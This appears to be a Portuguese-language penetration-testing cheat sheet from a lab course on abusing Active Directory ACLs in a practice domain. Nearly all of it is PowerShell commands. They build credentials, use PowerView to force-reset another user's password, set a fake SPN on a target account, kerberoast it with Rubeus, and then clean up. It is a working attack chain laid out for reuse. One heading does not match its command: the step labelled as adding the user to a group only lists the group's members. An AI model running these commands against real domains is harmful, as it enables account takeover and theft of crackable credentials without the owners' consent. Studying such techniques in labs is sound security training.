ACL Abuse Tactics

Criando um objeto PSCredential

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

Criando um objeto SecureString

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

Alterando a senha do usuário

cd C:\Tools\
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

Criando um objeto SecureString usando damundsen

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)

Adicionando damundsen ao grupo de nível 1 do Help Desk

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

Confirmando que damundsen foi adicionado ao grupo

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Criando um SPN falso

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Kerberoasting with Rubeus

.\Rubeus.exe kerberoast /user:adunn /nowrap

Limpeza

Removendo o SPN falso da conta de adunn

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

Removendo damundsen do grupo de nível 1 do Help Desk

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

PreviousACL Enumeration NextDCSync

Last updated 4 months ago